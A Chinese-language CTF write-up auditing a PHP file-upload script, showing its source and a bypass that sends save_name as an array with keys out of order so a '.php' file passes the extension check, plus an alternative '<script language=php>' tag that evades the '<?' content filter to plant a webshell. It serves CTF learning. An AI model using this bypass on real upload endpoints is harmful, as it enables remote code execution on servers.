美文网首页
一次ctf文件上传php代码审计

一次ctf文件上传php代码审计

作者: flashine | 来源:发表于2020-04-13 01:12 被阅读0次

    朋友发的一个ctf题,做了好久才做出来,记录一下。

    0x01 源码

    <?php
    highlight_file(__FILE__);
    @mkdir("./upload");
    
    if (isset($_POST['submit'])) {
            $is_upload = false;
            $text = null;
            if(!empty($_FILES['upload_file'])){
                $allow_type = array('image/jpeg','image/png','image/gif');
                if(!in_array($_FILES['upload_file']['type'],$allow_type)){
                    $text = "type forbidden";
                }else{
                    $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
                    $temp_name = $_FILES['upload_file']['tmp_name'];
                    if (!is_array($file)) {
                        $file = explode('.', strtolower($file));
                    }
    
                    $ext = end($file);
                    $allow_suffix = array('jpg','png','gif');
                    if (!in_array($ext, $allow_suffix)) {
                        $text = "ext forbidden";
                    }else{
                        $file_name = reset($file) . '.' . $file[count($file) - 1];
                        $img_path = "./upload" . '/' .$file_name;
                        if (mb_strpos(file_get_contents($_FILES['upload_file']['tmp_name']), "<?") !== FALSE) {
                            $text = "hacker";
                        }else{
                            if(file_exists($img_path)){
                                $text = "file exist already";
                            }else{
                                if (move_uploaded_file($temp_name, $img_path)) {
                                    $text = "upload succeed";
                                    $is_upload = true;
                                } else {
                                    $text = "upload failed";
                                }
                            }
                        }
                    }
                }
            }else{
                $text = "please upload your file";
            }
    }
    ?>
    

    0x02 代码初步分析

    1. 由于服务使用了php版本为5.6.40,且容器为Apache,所以00截断用不了,其他的解析漏洞也用不上。
    2. 对上传文件的Content-Type做了白名单限制,限制为图片类型,由于没有对文件内容进行校验,所以只需要把shell写到一个文本文件再重命名为jpg就行。
    3. 对文件后缀进行了白名单限制,限制只能为jpgpnggif
    4. 对文件内容进行了检查,不允许文件内容中出现<?

    0x03 代码深入分析

    由于是ctf,所以这里必然有漏洞,做不出来就是知道的东西太少了。
    由于php是弱类型语言,在字符串与数字进行比较时,会将字符串强制转换为数字再进行比较,所以:

    php -r "echo 0=='jpg';"
    1
    

    但是基于multipart/form-data的POST请求得到的数据只能是文件或者字符串或者数组,不可能是数字,所以这个思路是不行的。
    考虑到如下内容:

    $ext = end($file);
    $file_name = reset($file) . '.' . $file[count($file) - 1];
    

    在已经获得$ext作为后缀名的情况下,没必要再通过$file来获取后缀名进行拼接。
    考虑到这里的$file必须是个数组的情况下,explode()函数不可控,那么可以通过更改input标签中name的方式来将save_name修改为一个数组:

    image.png
    由于需要对后缀名进行校验,那么数组长度必然大于或等于2,count($file) - 1的值只能为key是数组长度减1的值,但是此处不可控。
    经过多次测试:
    <?php
    $a[1] = 1;
    $a[0] = 0;
    echo end($a);
    echo "<br>";
    var_dump($a);
    ?>
    //输出结果:
    0
    array(2) { [1]=> int(1) [0]=> int(0) } 
    

    php中手动用数字来定义的key,并不会按照从小到大的顺序进行存储,所以end()函数只会提取到数组最后定义的key对应的值,而通过数组长度减一得到的值就不一定和end()函数得到的值一致了。

    当使用$a=[0,1]的写法时,end()函数得到的值与数组长度减一得到的值就又一致了。
    采用绕过的答案如下:

    #直接修改burp数据包:
    Content-Disposition: form-data; name="save_name[1]"
    
    1.php
    -----------------------------6027882332248
    Content-Disposition: form-data; name="save_name[0]"
    
    jpg
    

    php文件标记可以采用如下三种格式:

    // 1.
    <?php 
    ?>
    //2. 需要在php.ini中设置short_open_tag = On
    <?
    ?>
    //3.
    <script language="php">
    </script>
    //4. 需要在php.ini中配置asp_tags = On ,一般默认是Off,7.0以上版本已移除这个配置
    <%
    %>
    

    针对文件内容检查可采用第三种格式。

    相关文章

      网友评论

          本文标题:一次ctf文件上传php代码审计

          本文链接:https://www.haomeiwen.com/subject/yehwmhtx.html